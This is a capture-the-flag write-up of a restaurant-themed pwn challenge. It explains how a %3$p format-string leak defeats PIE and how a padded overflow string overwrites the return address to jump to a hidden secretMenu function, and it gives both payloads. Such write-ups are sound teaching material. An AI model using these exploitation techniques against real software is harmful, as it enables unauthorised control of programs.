Tags: pwn 

Rating:

## **The Thought Process**

The target program is simple: First, you are prompted for your order. Your order is then repeated back to you (exactly, character-for-character) and you are prompted to enter your payment information. The binary is available for us to download and run tests on our local machine.

Our input for the first prompt being echoed back to us is a suggestion that there may be a format string vulnerability in the print statement following the first input; our input is repeated back to us. Inputting a bunch of format specifiers (such as `%p %p %p`) confirms our suspicion as the program spits out a bunch of random hex values, one of which looks like a code address!

Additionally, the program seems to be susceptible to buffer overflows. We figure this out by spamming a ton of characters for our input and getting a segmentation fault when running the binary locally. We can find exactly how many bytes are needed to overwrite the buffer by spamming "AAAABBBBCCCCDDDD...ZZZZ" and seeing what the program tries to jump to. For instance, if we segfault at address 0x48484848, the "HHHH" in our spam overwrote the return address.

Lastly, the binary is compiled with PIE (Position Independent Executable) as the description suggests. This means that code addresses are randomized on every execution of the program.

So with all these facts laid out - how can we get the flag? Opening the binary in gdb and running `info func` reveals a tasty-looking function: `secretMenu`. We most likely have to overwrite the return address of the `runRestaurant` function with the address of `secretMenu` using the buffer overflow vulnerability.

Because the binary was compiled with PIE, the address of `secretMenu` changes on every run! Fortunately, we can use the format string vulnerability linked to the first input to leak a code address, which we can then use to calculate the address of `secretMenu`. We end up discovering that the address leaked by `%3$p` is -0xcf bytes away from `secretMenu`, so we can overwrite the return address of `runRestaurant` with the address of `leak+0xcf`.

## **The Payload**
The Order: `%3$p` - This will leak a code address to be used to calculate the address of `secretMenu`.

The Payment: `AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWW[secretMenuAddr]`

If we found the address of `secretMenu` to be 0x56551234 for example, we replace `[secretMenuAddr]` with a byte string `\x34\x12\x55\x56`.

`pwntools` is a useful python library for connecting to remote servers using netcat, reading what the remote server prints, and sending payloads.